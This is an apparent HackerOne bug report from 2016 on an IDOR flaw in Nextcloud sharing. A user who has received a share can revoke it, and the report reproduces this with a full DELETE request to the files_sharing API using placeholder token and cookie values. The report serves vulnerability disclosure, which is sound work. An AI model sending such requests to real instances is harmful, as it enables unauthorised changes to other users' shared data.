Nextcloud: IDOR - Disable sharing

2016-07-26T06:21:54
ID H1:153905
Type hackerone
Reporter dalt
Modified 2016-12-03T21:58:44

Description

Decription:

Users are shared files or folder. can disable this sharing.

Detail:

  • use request:

DELETE /nextcloud/ocs/v2.php/apps/files_sharing/api/v1/shares/[share-id]?format=json HTTP/1.1 Host: [your-host] User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:47.0) Gecko/20100101 Firefox/47.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate requesttoken: [token of user is shared] OCS-APIREQUEST: true X-Requested-With: XMLHttpRequest Cookie: [cookie of user is shared] Connection: keep-alive

Note:

only user is shared or user in group is shared can do it